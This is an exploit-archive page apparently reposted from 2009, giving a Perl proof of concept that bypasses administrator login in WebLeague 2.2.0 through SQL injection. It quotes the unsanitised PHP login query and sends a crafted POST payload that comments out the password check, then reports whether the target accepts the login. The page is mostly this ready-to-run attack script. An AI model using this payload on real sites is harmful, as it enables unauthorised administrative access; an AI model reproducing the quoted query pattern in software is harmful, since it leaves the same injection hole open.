首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
webLeague 2.2.0 (Auth Bypass) Remote SQL Injection Exploit
来源:ka0x01[at]gmail.com 作者:ka0x 发布时间:2009-07-17  

#!/usr/bin/perl -W
#
# WebLeague 2.2.0 Remote Admin Bypass p0c
# written by ka0x <ka0x01[at]gmail.com>
#
# need magic_quotes_gpc = Off
#
# Vuln code (Admin/index.php) :
#
# 10: $sql="SELECT * FROM $admintable WHERE name = '$_POST[username]' AND password = '$_POST[password]'"; // ---> NOT CLEAN $_POST VARS
# 11: $result=mysql_query($sql,$db);
# 12: $number = mysql_num_rows($result);
# 13: if ($number == "1") {
#

use LWP::UserAgent ;

my $timeout = 10 ;

die "* USAGE: \tperl $0 <host>\n" unless $ARGV[0] ;

my $host = $ARGV[0] ;

$host = 'http://'.$host if( $host !~ /^http:/ ) ;
$host = $host.'/' unless( substr( $host, -1 ) eq '/' ) ;

my $ua = LWP::UserAgent->new() or die;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1") ;
$ua->timeout( $timeout ) ;

my $req = HTTP::Request->new( POST => $host.'Admin/index.php' );
$req->content_type( 'application/x-www-form-urlencoded' ) ;
$req->content( 'username=\'/*&password=*/ or \'\'=\'' ) ;  # content $_POST vars:
        # username=  '/*
        # password=   */ or ''='
my $res = $ua->request( $req ) ;

if( $res->content =~ /You are logged in as/i ){
 print "[+] The website is vulnerable." ;
}
else {
 print "[-] The website isn't vulnerable." ;
}


__END__


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft Office Web Component
·ZenPhoto Gallery 1.2.5 Admin P
·Zortam MP3 Player 1.50 (m3u) I
·Zortam MP3 Media Studio 9.40 M
·Admin News Tools Remote Conten
·Hamster Audio Player 0.3a Univ
·Multiple Web Browsers Denial o
·MultiMedia Jukebox 4.0 Build 0
·Infinity <= 2.0.5 Arbitrary Cr
·Easy RM to MP3 Converter 2.7.3
·Mozilla Firefox 3.5 unicode Re
·MixSense 1.0.0.1 DJ Studio (.m
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved